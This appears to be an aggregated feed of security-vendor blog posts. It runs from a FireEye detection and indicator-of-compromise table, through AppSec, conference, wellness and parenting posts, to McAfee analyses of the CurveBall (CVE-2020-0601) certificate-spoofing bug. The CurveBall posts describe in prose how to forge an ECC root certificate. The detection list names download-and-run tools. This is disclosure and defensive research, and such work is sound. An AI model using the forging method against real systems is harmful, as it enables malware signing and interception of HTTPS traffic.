Aside from CVE-2019-19781, FireEye detects the activity described in this post across our platforms, including named detections for Meterpreter, and EternalBlue. Table 2 contains several specific detection names to assist in detection of this activity.

Signature Name

CERTUTIL.EXE DOWNLOADER (UTILITY)

CURL Downloading Shell Script

ETERNALBLUE EXPLOIT

METERPRETER (Backdoor)

METERPRETER URI (STAGER)

SMB - ETERNALBLUE

Table 2: FireEye Detections for activity described in this post

Indicators

Table 3 provides the unique indicators discussed in this post.

Indicator Type

Indicator

Notes

Network

45[.]120[.]53[.]214

 

Network

198[.]44[.]227[.]126

 

Host

91dd06f49b09a2242d4085703599b7a7

piz.Lan

Host

01af5ad23a282d0fd40597c1024307ca

de.py

Host

bd977d9d2b68dd9b12a3878edd192319

ld.sh

Host

0caf9be8fd7ba5b605b7a7b315ef17a0

.new.zip

Host

9aa67d856e584b4eefc4791d2634476a

x86.dll

Host

55b40e0068429fbbb16f2113d6842ed2

x64.dll

Host

b0acb27273563a5a2a5f71165606808c

scan.py

Host

6cf1857e569432fcfc8e506c8b0db635

xp_eternalblue.replay

Host

9e408d947ceba27259e2a9a5c71a75a8

eternalblue.replay

Host

e345c861058a18510e7c4bb616e3fd9f

avpass.exe

Host

48452dd2506831d0b340e45b08799623

since1969.exe

Email Address

asgardmaster5@protonmail[.]com

From ransom note

Email Address

ragnar0k@ctemplar[.]com

From ransom note

Email Address

j.jasonm@yandex[.]com

From ransom note

Table 3: Collection of IOCs from this blog post

Forrester Analysis on the State of Government Application Security: Government Must Make Significant Advances

In a recent report, The State of Government Application Security, 2020, Forrester analysts establish that governments are far behind other industries in critical areas of application protection. This finding ??? backed by the Forrester Analytics Global Business Technographicsツョ Security Survey, 2019 ??? is especially alarming given the amount of sensitive citizen data housed by government agencies. And, since applications are currently the most common form of breaches, governments need to start investing heavily in application security (AppSec).

For starters, government agencies need to implement prerelease scans to reduce the remediation time of security flaws. By implementing prerelease scans, like static analysis, flaws can be detected earlier in the development lifecycle. But it is not just a matter of implementing occasional prerelease scans. According to Veracode???s State of Software Security Industry Snapshot, government agencies currently scan 90 percent of their applications 12 times a year, which equates to only once a month. Government agencies need to formulate an AppSec program with a regular cadence of frequent scans. Industries that scan applications more frequently find and remediate flaws faster and, as a result, have less security debt.

It is also important that governments embrace DevSecOps practices. DevSecOps is a methodology that introduces collaboration between development, operations, and security. Part of the collaboration involves shifting security to the beginning of the development process. This concept helps save time because security flaws and vulnerabilities are recognized and addressed prior to deployment. But embracing DevSecOps is not just about adding manual prerelease scans, it is about properly implementing prerelease tools. Here are three things to consider:

  • Prepare a business case for prerelease testing of applications that is centered around citizen trust. Make the case for adopting dynamic, static, and software composition analysis based on increasing citizen trust and improving citizen experience. A data breach is a surefire way to erode citizen trust.
  • Automate prerelease scans whenever possible and integrate the scans with build tools like Jenkins or ticketing tools like Jira. Automation and integrations help you recognize the benefits of AppSec tests and speed up the remediation process.
  • Scan both in-house applications as well as third-party applications. If you neglect to scan third-party applications, an unidentified flaw could compromise your data and negatively affect your customer experience.

Although government agencies are currently falling behind with these vital security measures, with the right products and a little guidance, governments can be caught up in no time. Read the full Forrester report for details on the state of AppSec in government agencies.

RSA 2020 – See You There!

It’s that time of year again—security companies are starting to gear up for the RSA Conference in San Francisco’s Moscone Center. Known as one of the world’s largest security conferences, RSA attracts around 42,000 attendees, including 700 speakers, and hosts more than 550 sessions. This year, RSA organizers are adding a new element for attendees to enjoy called the “Engagement Zone,” a networking space designed to inspire attendees with an interactive, collaborative and cooperative learning space.

This year’s RSA Conference theme is the “Human Element.” With new technologies, strategies and AI being employed by both security pros and threat actors, one thing remains constant: us. We are the Human Element within cybersecurity. Here at McAfee, we couldn’t agree more. McAfee’s Senior Principal Engineer and Chief Data Scientist, Celeste Fralick, said, “While the possibilities with AI seem endless, the idea that they could eliminate the role of humans in cybersecurity departments is about as farfetched as the idea of a phalanx of Baymaxes replacing the country’s doctors.” According to Celeste, AI and humans have equally important roles in cybersecurity. “There are tasks that humans currently excel at that AI could potentially perform someday. But these tasks are ones that humans will always have a sizable edge in, or are things AI shouldn’t be trusted with.”

Whether you’re a seasoned veteran or a first-time attendee at RSA, you should sketch out a game plan of the sessions and booths you want to visit before making your way into the city.

Join McAfee at RSA 2020

CSA Summit Keynote: Case Study: Obvious and Not-So Obvious Lessons Learned On the Path to Cloud-First IT

Monday, February 24 | 1:00pm – 1:20pm| Moscone Center

Land O’ Lakes operates a global dairy and agriculture co-operative across 60 countries with thousands of distributed employees. The demands of global business once required highly complex applications running in their private data centers, but are now met with increased velocity and better security in the public cloud. How did they do it? Hear from Land O’ Lakes CISO Tony Taylor and McAfee SVP of Cloud Security Rajiv Gupta as they share lessons learned along the journey to cloud-first IT at Land O’ Lakes, including new requirements for cloud-native security controls and the evolution to a cloud-edge architecture that has replaced their former network.

Keynote: Time to Tell

Tuesday, February 25 |8:35am – 8:55am | RSA West Stage | Session Code: KEY-T03W

Cyber defenses from a generation ago linger front and center, even as quantum computing will reshape the digital world. Steve Grobman makes the case it’s time to move beyond intelligence.

Session: Inside the Takedown of the Rubella Macro Builder Suspect

Tuesday, February 25 | 1:00pm – 1:50pm | Moscone South | Session Code: PART1-T10

During this session, the McAfee Advanced Threat Research lead investigator will explain some of the details the team found that helped unmask the suspected actor behind the Rubella Macro Builder. These details were shared with law enforcement and proved to be crucial in its investigation.

Session: Emerging Threats: Deep Fakes are Getting Terrifyingly Real – How Can We Spot Them?

Monday, February 24 | 3:05pm – 3:35pm | Moscone West | Session Code: SEM-M03

This seminar will provide a full day of focus on emerging threats such as ransomware, targeted attacks, emerging IoT threats, and new aspects of social engineering and deep fake human manipulation. Sessions get inside the minds and motivations.

Session: Reproducibility: The Life and Risks of a Model

Tuesday, February 25 | 2:20pm – 3:10pm | Moscone West, Classroom: MLAI1-R09 | Session Code: MLAI1-R09

Analytics are becoming ubiquitous in the ever-increasing world of data. Often, those analytics are implemented without thorough consideration of the life and the risks of the model employed. This session will explore enabling reproducibility and repeatability in data science, the life cycle of a model, what is missing in typical models of today, and how to ensure the healthy and reliable life of a model.

See You Soon!

There’s a lot to look forward to at RSA 2020, so be sure to stop by booth #N-5745 in the North Hall for demos, theater sessions, and more. Feel free to use code XS0UMCAFE for a free RSAC expo pass. Also, be sure to follow @McAfee for real-time updates from the show throughout the week.

 

The post RSA 2020 – See You There! appeared first on McAfee Blogs.

You Bring the Yoga Mat, McAfee Brings the Goats

Yogis are likely familiar with the term vinyasa, but have you heard of caprine vinyasa? Caprine vinyasa elevates your standard yoga practice to a whole new level – with goats!

At McAfee, we recognize how beneficial stepping away from our desk can be for both our bodies and minds. Taking time to recharge, reset, and care for our physical and mental health is critical to live our best lives at and away from the office.

To offer our team members a smile-inducing wellness opportunity to practice mindfulness, we brought goats to the office for a yoga session. Why goats? Because animal therapy is known to lower blood pressure, lower anxiety, and increase mental stimulation (this is also why you can bring your dog to the office on Fridays!).

During our goat yoga day, goats climbed on people, nuzzled up next to others, and played with each other across the yoga mats. It was nearly impossible to take anything too seriously or to leave without a smile.

“I never imagined I’d be doing yoga with my teammates, let alone with goats climbing on my back! For me, it says a lot about a company that cares enough about employees to offer time away from your desk to practice mindfulness in a unique way. I can’t say I’ll join the regular goat yogis, but it was great experience with my team!”– Jenna, People Analytics

Ready to join a company that cares about your wellbeing (and loves furry friends!), search our openings.

The post You Bring the Yoga Mat, McAfee Brings the Goats appeared first on McAfee Blogs.

In for the weakness, in for the Hack

On my 1st week of the basic course in the Israeli army I was taught that in terms of information security there is no information item that is too negligible or too small to deal with.

The base location, the unit’s name, how big is my team – shall not be told.
There is no need to brag about the amazing projects we do
and
There is no reason to connect external media to computers

EVERYTHING about information security is important and must be afterthought.

That approach is based on the assumption, that a person who was educated from the very 1st moment not to disclose the name of the unit (barely the city it is located at) will be very minded and aware with information of real potential harm.

This is an excellent and well-proven attitude with regard to security, and I’d expect it to be a corner stone in mission critical cyber security organizations and industries such as: medical, energy, avionics and automotive.

You can imagine how surprised I was when I heard too many times from too senior executives in tone-dictating companies:

“The distance between weakness to hack to actually take over a vehicle and put people in jeopardy is very large. We shall not be excited by each vulnerability.”

Technically, to some extent, they are right. The transition from weakness to exploitation is significant and sometimes impossible. Not every weakness will end in ransomware massage on your airplane infotainment screen.

But this is exactly the intricate approach to security events that we must not remain indifferent to.

After all, taking control of a Jeep Cherokee was a combination of weaknesses, exploitation methods, not well protected communication, etc.

At the end of the day, each cyber incident begins with a weakness that was not well covered, or published or addressed – piling  on top of that a great motivation, high technical skills and tenacity will lead to an assault that will make you wanna cry.

As Lau Tzu said ‘A journey of a thousand miles begins with a single step

In cyber-security arena a small buffer overflow – can sometimes be this single step required

With cyber security we must go ‘All-In’ and leave nothing to luck. We must identify all the threats and evaluate the degree of exposure each one produces.

This knowledge provides us with options to tackle and resolve – some as simple as use different compilation method, some as complex as applying to the supply chain and development teams and some can be solved through an operative mechanism and processes.

I know that this ‘epiphany’ moment about the security status of your product usually causes more headaches than reliefs – since it usually brings a flood of new issues and gaps and their treatment does not make it easier to meet the schedule or increase the margins.

Much easier and more fun is to cover with the warm blanket of the blessed ignorance and practice surprised gestures.

To my opinion this is not a privilege we have in critical infrastructures and specifically in the current era of revolution. We strive for a shared, electronic and autonomous world – cyber attack will stave off the revolution and create a severe blow to the spirit of progress we all enjoy anticipating.

I know that the cyber security industry aware of these needs, there are solution (am sure that they can get better) for doing just that: Cyber Risk Assessment – mapping vulnerabilities, finding violation of security policies, competence with the emerging ISO 21434, hardening issues, mal performance of encryption and even identifying the entire software stack. Risk assessment is conducted to avoid incidents and the right measures should be devoted to do just that – Avoid incidents, not respond, avoid.

To sum up, as I was told by the first sergeant while patrolling around the base, and as ‘Ivar the Boneless’ discovered at the last season of the Vikings – A single uncovered crack and you may loose the fortress, Loose the Trust of the people and find yourself dinning with the Gods at Valhalla.

Therefore, don’t oversee your flaws and vulnerabilities – the progress starts there – you should accept yourself (and your not perfect code) as you are and strive for improvement.

Guest blog Written by Eddie Lazebnik  – Brining 15 years of cyber experience – both in private and public sector and recently in a groundbreaking startup.  Served for about a decade the Isreali government and military organizations of Cyber Security. Possessing education in business administration, having a proven technical execution record and great passion for technology and innovation. Very excited about the revolution of IoT and specifically in Automotive industry -connected and autonomous vehicles. These days leading strategy and strategic partnerships activity in Cybellum.

The post In for the weakness, in for the Hack appeared first on CyberDB.

Report: A Cyberattack Could Severely Disrupt the US Financial System

A new staff report from the Federal Reserve Bank of New York highlights the risk and potential fallout that a sophisticated cyberattack might have on the United States.In the report, analysts examined a scenario in which a single-day shock hits the country???s payment network, Fedwire, measuring the broad impact it would have on the economy. The results? A significant 38 percent of the network would be affected on average by significant spillovers to other banks, damaging the stability of the broader financial system in the United States.

How an attack might unfold

According to the analysts, this hypothetical situation would unfold swiftly. It begins with a cyberattack that allows financial institutions to continue receiving payments but prevents them from sending any payments throughout the operating day. In this scenario, because payments are actualized when Fedwire receives requests from senders, an institution???s balance in the system immediately reflects those changes???yet the targeted financial institution is unable to interact with Fedwire, causing a backup in the system. Essentially, impacted banks would become black holes that absorb liquidity without distributing any money.

Timing matters too and can magnify the impacts of a breach. ???Attacks on seasonal days associated with greater payment activity are more disruptive relative to non-seasonal days, with average impacts that are about 13 percent greater,??? the report says. ???We estimate that, on average, attacking on the worst date for a particular large institution adds an additional 25 percent in impairment relative to the case of no specific knowledge.???

The domino effect of liquidity hoarding

An important point to consider from this analysis is that the consequence of hoarding cash and forgoing payments during a breach can worsen the situation. The report explains, ???We find that liquidity hoarding amplifies the network impact of the cyberattack, both increasing the average impact on the system and increasing the maximal risk.??? As banks are not necessarily perceptive of daily liquidity conditions because they have ample reserves on hand, they likely will not react to these irregularities very quickly. Thus, all institutions other than the one impacted by a breach will continue to make payments as usual, resulting in substantial interruptions in the network.

It???s a domino effect that could shake up the whole system. Analysts uncovered a correlation between assets and payments over 80 percent, finding that a smaller subset of banks plays a vital role in markets like equity and Treasury. A cyberattack on a single institution could impede the day-to-day functions of the payment network and cause quite a headache that extends beyond the impacted institutions, reaching into the economy.

Failing to respond to these issues strategically as they unfold can lead to that previously mentioned black hole of liquidity. This problem may be worsened if financial institutions use the same third-party service providers, which offers less incentive for banks to monitor activity and spot abnormalities that can cause liquidity interruptions.

Strengthening security for financial institutions

Considering the above scenario, data from our most recent State of Software Security report (SOSS) indicates that the financial industry has some work to do to shore up its application security. The figures reveal that, in the financial industry specifically, the median time to remediate security flaws in code (MedianTTR) is 67 days, which is higher than nearly every other industry we measured. Information leakage also has a high prevalence at 66 percent as opposed to 63 percent across all industries.

Our data uncovers best practices that are dramatically improving remediation times and reducing overall security debt. The analysis for this year???s report found that when organizations scan their applications for security more than 260 times per year their median fix time drops from 68 days to 19 days???a 72% reduction.

Get more details on the application security trends and best practices in the full SOSS report.

ツ?

Dangerous Digital Rituals: Could Your Child be Sleep Deprived?

sleep depravation and teens

You’re not wrong if you suspect your kids are spending far more time online than they admit. Where you may be in the dark, however, is that a lot of kids (maybe even yours) are scrolling at night instead of sleeping, a digital ritual that puts their physical and mental health at risk.

And, because sleep and behavior are so intertwined, one family member’s unwise tech habits can quickly spill over and affect the whole family.

Screens over ZZZs

That moody stew your daughter has been dishing up all day or may not be standard teen angst. And the D in math your son brought home for the first time may have little to do with geometric proofs.

While it may not be the first thing that comes to a parent’s mind, sleep deprivation could be a source of a number of family challenges today.

According to a 2019 Common Sense Media study, 68 percent of teens take their devices to their rooms at bedtime, and one-third have the phone with them in bed. Over one-third of those kids and, more than one-fourth of parents admit to waking up to look at their phone at least once a night (usually to check social media or respond to a notification).

What science says

Like water and air, humans need sleep to live. Sleep deprivation over time is a serious condition, especially for children. Medical studies continue to link poor sleep habits to anxiety, reduced cognitive development, obesity, immunity issues, absentmindedness, and impaired judgment. Because depriving the brain of sleep reduces its reaction time, it’s also one of the main causes of road accidents.

How much sleep do they need? The American Academy of Pediatrics recommendations:

  • Children 3-5 should sleep 10 to 13 hours on a regular basis
  • Children 6-12 should sleep 9 to 12 hours on a regular basis
  • Children 13-18 should sleep 8 to 10 hours on a regular basis

Goal: digital responsibility

I recently met a mom in a parenting forum who tackled this very issue by establishing clear ground rules for nighttime device use.

Dana Ahern is the mom of four (ages 7-15) and co-founder (along with husband Adam) of Village Social, a private, safe, “alternative” social network that helps teach kids digital responsibility.

Ahern says establishing ground rules for devices only works if parents stick to them.

“Yes, they [kids] might get mad,” says Ahern. “Yes, they may say they need their phone to listen to music or a meditation app to be able to fall asleep or need the alarm to wake up in the morning. Our solution — get them an Echo Dot or an old fashioned alarm clock radio in place of the phone.”

In the Ahern home, all screens must be shut off at least one hour before bedtime and put on a docking station in the parents’ bedroom. Screen time is tracked via Apple’s Downtime app. And, all homework must be done in the living room (no bedrooms) with an absolute cut-off time of 10 p.m.

Says Ahern, “We’ve found that it’s been relatively easy to get all the kids on this schedule. They don’t fight it. They may, in fact, secretly appreciate knowing we care.”

More ideas to consider:

It’s never “too late” for a good change. Some parents say they’re reluctant to give their kids (especially teens) new technology rules because it’s “too late,” and their kids are too attached to their devices. Even so, with more information linking technology to kids’ mental health, it’s imperative to change course if needed — even if doing so may be difficult.

Reframe the change. Why are kids on their phones all night? Because they want to be and want often overpowers need in this age group. To help kids make tough digital shifts, discuss the personal gains that will result from the change. For instance, consistent quality sleep can help control weight, boost academic and athletic performance, increase energy and immunity levels, reduce drama and conflict, sharpen decision-making, and improve creativity and motivation. In short, quality sleep ignites our superpowers.

Add monitoring muscle. There a number of ways to help keep a child’s screen time on track. One way is to get a monitoring solution. Need to make sure your youngest is only accessing the internet for homework at night? Or limit online game time to 30 minutes a day? Software support could help.

Model good sleep habits. Your kids will be the first ones to call you out if your screen time goes up while they are digitally wasting away. In the same above study, 39 percent of teens said their parents spent too much time on their phones in 2019 (an 11-point jump from 2016).

Any change to your child’s favorite rituals may put a temporary strain on the family dynamic. That’s okay. A little healthy tension, some grumbling, and lingering awkwardness are all side effects of successful digital parenting. Also, remind yourself and your kids as often as you need to that restricting device use — especially at bedtime — isn’t a punishment. It’s a health and safety choice that isn’t negotiable. Translation? Limits equal love.

The post Dangerous Digital Rituals: Could Your Child be Sleep Deprived? appeared first on McAfee Blogs.

CurveBall – An Unimaginative Pun but a Devastating Bug

Enterprise customers looking for information on defending against Curveball can find information here.

2020 came in with a bang this year, and it wasn’t from the record-setting number of fireworks on display around the world to celebrate the new year. Instead, just over two weeks into the decade, the security world was rocked by a fix for CVE-2020-0601 introduced in Microsoft’s first patch Tuesday of the year. The bug was submitted by the National Security Administration (NSA) to Microsoft, and though initially deemed as only “important”, it didn’t take long for everyone to figure out this bug fundamentally undermines the entire concept of trust that we rely on to secure web sites and validate files. The vulnerability relies on ECC (Elliptic Curve Cryptography), which is a very common method of digitally signing certificates, including both those embedded in files as well as those used to secure web pages. It represents a mathematical combination of values that produce a public and private key for trusted exchange of information. Ignoring the intimate details for now, ECC allows us to validate that files we open or web pages we visit have been signed by a well-known and trusted authority. If that trust is broken, malicious actors can “fake” signed files and web sites and make them look to the average person as if they were still trusted or legitimately signed. The flaw lies in the Microsoft library crypt32.dll, which has two vulnerable functions. The bug is straightforward in that these functions only validate the encrypted public key value, and NOT the parameters of the ECC curve itself. What this means is that if an attacker can find the right mathematical combination of private key and the corresponding curve, they can generate the identical public key value as the trusted certificate authority, whomever that is. And since this is the only value checked by the vulnerable functions, the “malicious” or invalid parameters will be ignored, and the certificate will pass the trust check.

As soon as we caught wind of the flaw, McAfee’s Advanced Threat Research team set out to create a working proof-of-concept (PoC) that would allow us to trigger the bug, and ultimately create protections across a wide range of our products to secure our customers. We were able to accomplish this in a matter of hours, and within a day or two there were the first signs of public PoCs as the vulnerability became better understood and researchers discovered the relative ease of exploitation.

Let’s pause for a moment to celebrate the fact that (conspiracy theories aside) government and private sector came together to report, patch and publicly disclose a vulnerability before it was exploited in the wild. We also want to call out Microsoft’s Active Protections Program, which provided some basic details on the vulnerability allowing cyber security practitioners to get a bit of a head start on analysis.

The following provides some basic technical detail and timeline of the work we did to analyze, reverse engineer and develop working exploits for the bug.  This blog focuses primarily on the research efforts behind file signing certificates.  For a more in-depth analysis of the web vector, please see this post.

Creating the proof-of-concept

The starting point for simulating an attack was to have a clear understanding of where the problem was. An attacker could forge an ECC root certificate with the same public key as a Microsoft ECC Root CA, such as the ECC Product Root Certificate Authority 2018, but with different “parameters”, and it would still be recognized as a trusted Microsoft CA. The API would use the public key to identify the certificate but fail to verify that the parameters provided matched the ones that should go with the trusted public key.

There have been many instances of cryptography attacks that leveraged failure of an API to validate parameters (such as these two) and attackers exploiting this type of vulnerability. Hearing about invalid parameters should raise a red flag immediately.

To minimize effort, an important initial step is to find the right level of abstraction and details we need to care about. Minimal details on the bug refer to public key and curve parameters and nothing about specific signature details, so likely reading about how to generate public/private key in Elliptical Curve (EC) cryptography and how to define a curve should be enough.

The first part of this Wikipedia article defines most of what we need to know. There’s a point G that’s on the curve and is used to generate another point. To create a pair of public/private keys, we take a random number k (the private key) and multiply it by G to get the public key (Q). So, we have Q = k*G. How this works doesn’t really matter for this purpose, so long as the scalar multiplication behaves as we’d expect. The idea here is that knowing Q and G, it’s hard to recover k, but knowing k and G, it’s very easy to compute Q.

Rephrasing this in the perspective of the bug, we want to find a new k’ (a new private key) with different parameters (a new curve, or maybe a new G) so that the ECC math gives the same Q back. The easiest solution is to consider a new generator G’ that is equal to our target public key (G’= Q). This way, with k’=1 (a private key equal to 1) we get k’G’ = Q which would satisfy the constraints (finding a new private key and keeping the same public key).

The next step is to verify if we can actually specify a custom G’ while specifying the curve we want to use. Microsoft’s documentation is not especially clear about these details, but OpenSSL, one of the most common cryptography libraries, has a page describing how to generate EC key pairs and certificates. The following command shows the standard parameters of the P384 curve, the one used by the Microsoft ECC Root CA.

Elliptic Curve Parameter Values

We can see that one of the parameters is the Generator, so it seems possible to modify it.

Now we need to create a new key pair with explicit parameters (so all the parameters are contained in the key file, rather than just embedding the standard name of the curve) and modify them following our hypothesis. We replace the Generator G’ by the Q from Microsoft Certificate, we replace the private key k’ by 1 and lastly, we replace the public key Q’ of the certificate we just generated by the Q of the Microsoft certificate.

To make sure our modification is functional, and the modified key is a valid one, we use OpenSSL to sign a text file and successfully verify its signature.

Signing a text file and verifying the signature using the modified key pair (k’=1, G’=Q, Q’=Q)

From there, we followed a couple of tutorials to create a signing certificate using OpenSSL and signed custom binaries with signtool. Eventually we’re greeted with a signed executable that appeared to be signed with a valid certificate!

Spoofed/Forged Certificate Seemingly Signed by Microsoft ECC Root CA

Using Sysinternal’s SigChecker64.exe along with Rohitab’s API Monitor (which, ironically is on a site not using HTTPS) on an unpatched system with our PoC, we can clearly see the vulnerability in action by the return values of these functions.

Rohitab API Monitor – API Calls for Certificate Verification

Industry-wide vulnerabilities seem to be gaining critical mass and increasing visibility even to non-technical users. And, for once, the “cute” name for the vulnerability showed up relatively late in the process. Visibility is critical to progress, and an understanding and healthy respect for the potential impact are key factors in whether businesses and individuals quickly apply patches and dramatically reduce the threat vector. This is even more essential with a bug that is so easy to exploit, and likely to have an immediate exploitation impact in the wild.

McAfee Response

McAfee aggressively developed updates across its entire product lines.  Specific details can be found here.

 

The post CurveBall – An Unimaginative Pun but a Devastating Bug appeared first on McAfee Blogs.

What CVE-2020-0601 Teaches Us About Microsoft’s TLS Certificate Verification Process

By: Jan Schnellbächer and Martin Stecher, McAfee Germany GmbH

This week security researches around the world were very busy working on Microsoft’s major crypto-spoofing vulnerability (CVE-2020-0601) otherwise known as Curveball. The majority of research went into attacks with malicious binaries that are signed with a spoofed Certificate Authority (CA) which unpatched Win10 systems would in turn trust. The other attack vector —HTTPS-Server-Certificates— got less attention until Saleem Rashid posted a first working POC on Twitter, followed by Kudelski Security and “Ollypwn” who published more details  on how the Proof-Of-Concepts are created.

McAfee Security experts followed the same approach and were able to  reproduce the attack.  In addition, they confirmed that users  browsing via unpatched Windows-Systems were protected provided their clients were deployed behind McAfee’s Web Gateway or Web Gateway Cloud Service and running the certificate verification policy. This is typically part of the SSL Scanner but is also available as a separate policy even if no SSL inspection should be done (see KB92322 for details).

In our first attempt, we used the spoofed version of a CA from the Windows Root CA Trust store to sign a server certificate and then only provided the server certificate when the HTTPS connection wanted to be established. That attempt failed and we assumed that we did not get the spoofing right. Then we learned that the spoofed CA actually needs to be included together with the server certificate and that chain of certificates is then accepted by an unpatched Windows 10 system.

But why is that? By sending the spoofed version, it becomes obvious that this is not the same certificate that exists in the trust store and should be denied immediately. Also, in the beginning, we tried hard to make the spoofed CA as similar to the original CA as possible (same common name, same serial number, etc.). In fact, we found that none of that plays any role when Windows does the certificate verification.

A good indication of what’s happening behind the scenes, is already provided by Windows’ own certificate information dialogs. We started with the “UserTrust ECC Certificate” in the Windows Trusted Root CA catalog which carries the friendly name “Sectigo ECC”. Then we created a spoofed version of that CA and gave it a new common name “EVIL CA”. With that, it was easy to set up a new test HTTPS server in our test network and manipulate the routing of a test client so that it would reach our server when the user types https://www.google.com into the browser. The test server  was presenting SSL session information for debugging purposes instead of any Google content.

When you click onto the lock symbol, the browser tells you that the connection has been accepted as valid and trusted and that the original “Sectigo ECC” root CA  had signed the server certificate.

But we know that this was not the case, and in contrast to our own original assumptions, Windows did not even verify the server certificate against the “Sectigo ECC. It compared it against the included spoofed CA. That can be seen, when you do another click to “View certificates”:

As the screenshot shows, we are still in the same SSL session (the master key is the same on both pictures), but now Windows is showing that the (correct) issuer of the server certificate is our spoofed “EVIL CA”.

Windows’ cryptographic signature verification works correctly

The good news is that Windows does not really have an issue with the cryptographic functions to validate the signature of an elliptic curve certificate! That verification works correctly. The problem is how the trust chain comparison is done to prove that the chain of signatures is correctly ending in the catalog of trusted root CAs.

We assumed that an attack would use a signing CA that points to an entry in the trusted Root CA store and verification of the signature would be limited so that the signature would be accepted although it was not signed with that original CA but a spoofed CA. But in fact, Windows is validating the embedded certificate chain — which is perfectly valid and cryptographically correct— and then matches the signing certificate with the entries in the trusted Root CA store. This last piece is what has not been done correctly (prior to the system patch).

Our tests revealed that Windows does not even try to match the certificates. It only matches the public key of the certificates (and a few more comparisons and checks) – making the comparison incomplete. That was the actual bug of this vulnerability (at least as web site certificates are concerned).

The Trusted Certificate Store is actually a Trusted Public Key Store

When we talk about the trust chain in SSL/TLS communication, we mean a chain of certificates that are signed by a CA until we reach a trusted Root CA. But Microsoft appears to ignore the certificates for the most part and manages a chain of the public keys of certificates. The comparison is also comparing the algorithm. At a time where only RSA certificates were used, that was sufficient. It was not possible for an attacker to create his own key pair with the same public key as the trusted certificate. With the introduction of Elliptic Curve Cryptography (ECC), Microsoft’s comparison of only the algorithm and the public key is failing. It is failing to also compare the characteristics of the elliptic curve itself. Without this additional parameter, it simply creates the same public key (curve point) again on a different curve. This is what was fixed on Patch-Tuesday — the comparison of the public key information now includes the curve characteristics.

This screenshot shows that the original certificate on the right side and the spoofed CA on the left are very different. Different common name, and a totally different elliptic curve (a standard curve for the original CA and a handcrafted for the spoofed version), but the signature seen under the “pub” entry is identical. That has been sufficient to make Windows believe that the embedded spoofed CA was the same as the trusted CA in the certificate store.

Why not comparing certificates by name or serial number?

A different (and maybe more natural) algorithm is to compare certificates by their common name and/or their serial number and whenever you have a match, continue the trust chain and verification with the certificate in the trust store. Why is Windows comparing public keys instead? We can only speculate but the advantage might be for Enterprises who want to swap their certificates without rolling out new root CAs to all client computers. Imagine an organization that maintains its own PKI and installs its own Root CA in the store of trusted certificates. When these companies go through mergers and acquisitions and the company name may change. This would be a good time to also change the common name of your signing certificate. However, if you do not have a good way to remote maintain all clients and update the certificate in the trusted store, it is easier to tell the Cooperation to use the original key pair of public and private keys and create a new certificate with that same key pair. The new cert will still match the old cert and no other client update is necessary. Convenient! But Is it secure? At this point it is not really a chain of trusted certificates but a chain of trusted public keys.

We tested whether this could also be mis-used to create a new cert when the old one has expired but that is not the case. After comparing the public keys, Windows is still using the expiration date of the certificate in the trusted store to determine whether the chain is still valid, which is good.

How to harden the process?

The root problem of this approach is that the complete cryptographic verification happens with the embedded certificates and only after verification the match against the entry in the trusted Root CAs store is done. That always has room for oversights and incomplete matching algorithms as we have seen with this vulnerability. A safe approach is to first match the certificates (or public keys), find the corresponding entry in the Trusted Root CA store and then use that trusted certificate to continue the signature verification. That way, the verification fails on the safe side and broken chains can be identified easily.

We do not know whether that has been changed with the patched Windows version or if only the matching algorithm has been improved. If not, we recommend reviewing this alternative approach and further hardening the implementation in the operating system and browser.

The post What CVE-2020-0601 Teaches Us About Microsoft’s TLS Certificate Verification Process appeared first on McAfee Blogs.

McAfee’s Defenses Against Microsoft’s CryptoAPI Vulnerability

Microsoft made news this week with the widely reported vulnerability known as CVE-2020-0601, which impacts the Windows CryptoAPI. This highly critical vulnerability allows an attacker to fake both signatures and digital certificates. The attacker would use spoofed Elliptic-curve cryptography (ECC) certificates for signing malicious files to evade detection or target specific hostnames to evade browser security alerts by making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider. A successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software.

The CVE-2020-0601 vulnerability reportedly impacts Windows 10, Windows Server 2019, and Windows Server 2016 OS versions. The Microsoft patch (below) addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates. 

Since it was identified, a public exploit POC was posted that will allow any malicious party to use this exploit to sign executables as a third party. Additionally, the bug could intercept and fake secure web (HTTPS) connections and has the power to fake signatures for files and emails.

Details on McAfee’s enterprise defenses against this vulnerability are outlined below and available in knowledge base article KB92322. Additional products may be updated with extra countermeasures and defenses as our research uncovers more. We will continue to update the articles.

What can you do to protect yourself?

The bug is considered to be highly critical. It is important for everyone running a vulnerable operating system to apply the security update provided by Microsoft.

Large organizations who follow 15/30/60-day patch cycles should consider making an exception and apply the patches as soon as possible.

Microsoft’s security patches are available here. The event is serious enough that the NSA has released its own security advisory, with mitigation information and how to detect exploitation, and urging IT staff to expedite the installation of Microsoft’s security updates. The Cybersecurity and Infrastructure Security Agency (CISA) at the Department of Homeland Security (DHS) have also released an emergency directive to alert the US private sector and government entities about the need to install the latest Windows OS fixes sooner rather than later.

How are McAfee Customers Protected?

McAfee products can help detect and prevent the exploit from executing on your systems.  Specifically:

McAfee Endpoint Security (ENS)

McAfee can help protect against this vulnerability with a signature set to help detect fraudulently signed files.

Threat Intelligence Exchange (TIE)

TIE can help to identify file signing abuse prior to patching by providing a workflow to pivot into spoofed CAs and their signed binaries already run in the environment.

McAfee Network Security Platform (IPS)

NSP signatures (Emergency Signature set version 10.8.3.3) will prevent file signing abuse by blocking connections that are using certificates known to be impacted by the vulnerability.

 Web Gateway

File inspection for signature have been implemented in Web Gateway Anti-Malware. Using HTTPs scanning on the Web Gateway will move the validity checks for certificates from endpoints to the gateway and provide a central HTTPS certificate policy that is not based on the vulnerable function.

McAfee MVISION EDR

MVISION EDR can detect exploit attempts for this vulnerability on patched systems. In order to identify devices that have been involved recently in an exploit attempt, the customer can use the Real Time Search dashboard to execute a query using an NSACryptEvents collector.

McAfee Active Response (MAR)

McAfee Active Response has the ability to detect exploit attempts for this vulnerability. To identify devices that have been involved recently in an exploit attempt, the customer can use Active Response Catalog to create a custom collector and Active Response Search to execute a query using that collector. McAfee Active Response (MAR) users can also do a real time query with the NSACryptEvents collector.

McAfee Enterprise Security Manager (SIEM)

McAfee Enterprise Security Manager can detect exploit attempts for this vulnerability on patched systems by detecting events routed to SIEM using new signatures available via the normal content update process. (Refer to the knowledge-base article outlining how to update EMS rules.)

New rules have been uploaded to the content server with new signature ID’s and descriptions for these events. Customers can use these to create alarms.

